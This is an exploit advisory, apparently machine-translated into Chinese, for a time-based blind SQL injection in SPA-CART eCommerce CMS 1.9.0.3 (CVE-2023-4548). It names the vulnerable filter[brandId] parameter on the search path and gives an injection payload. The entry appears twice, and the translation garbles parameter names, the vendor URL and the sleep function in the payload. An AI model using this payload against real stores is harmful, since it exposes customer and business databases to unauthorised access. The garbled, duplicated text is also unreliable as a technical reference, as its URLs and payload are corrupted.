#利用标题: SPA -CART电子商务CMS 1.9.0.3 -SQL注入
#利用作者:饼干
#日期: 20/08/2023
#vendor: spa-cart
#供应商HomePage: https://spa-cart.corm/
#软件link: https://demo.spa-cart.com/
#版本: 1.9.0.3
#测试在: Windows 10 Pro
#Impact:数据库访问
#CVE: CVE-2023-4548
#CWE: CWE-89/CWE-74/CWE-707
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
SQL注入攻击可以允许未经授权访问敏感数据,修改
数据并崩溃应用程序或使其无法使用,导致收入损失,并且
损害公司声誉。
PATH: /搜索
获取参数“过滤器[BrandID]'很容易受到SQL注入的影响
https://website/搜索?过滤=1Q=11load_filter=1filter [brandId]=[sqli] filter [price]=100-500filter [attr] [attr] [memory] [memory] []=500%20GBFILTER [attry] [attr] [attr] [attr] [attr] [color] [color] [color] [color] []=黑色
---
参数:过滤器[BrandID](GET)
Type:基于时间的盲人
title: mysql=5.0.12基于时间的盲人(查询睡眠)
PAYLOAD:过滤=1Q=1Q=11 load_filter=1filter [brandId]=4'xor(select(0)from(select(select(heape(7)))))xor'zfilter [price]=100-500-filter [attr] [attr] [attr] [attr] [attry] [memorme] [memorme] []=500 gbfilter []=500 gbfilter []
---
[-] 完毕
#利用作者:饼干
#日期: 20/08/2023
#vendor: spa-cart
#供应商HomePage: https://spa-cart.corm/
#软件link: https://demo.spa-cart.com/
#版本: 1.9.0.3
#测试在: Windows 10 Pro
#Impact:数据库访问
#CVE: CVE-2023-4548
#CWE: CWE-89/CWE-74/CWE-707
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
SQL注入攻击可以允许未经授权访问敏感数据,修改
数据并崩溃应用程序或使其无法使用,导致收入损失,并且
损害公司声誉。
PATH: /搜索
获取参数“过滤器[BrandID]'很容易受到SQL注入的影响
https://website/搜索?过滤=1Q=11load_filter=1filter [brandId]=[sqli] filter [price]=100-500filter [attr] [attr] [memory] [memory] []=500%20GBFILTER [attry] [attr] [attr] [attr] [attr] [color] [color] [color] [color] []=黑色
---
参数:过滤器[BrandID](GET)
Type:基于时间的盲人
title: mysql=5.0.12基于时间的盲人(查询睡眠)
PAYLOAD:过滤=1Q=1Q=11 load_filter=1filter [brandId]=4'xor(select(0)from(select(select(heape(7)))))xor'zfilter [price]=100-500-filter [attr] [attr] [attr] [attr] [attry] [memorme] [memorme] []=500 gbfilter []=500 gbfilter []
---
[-] 完毕
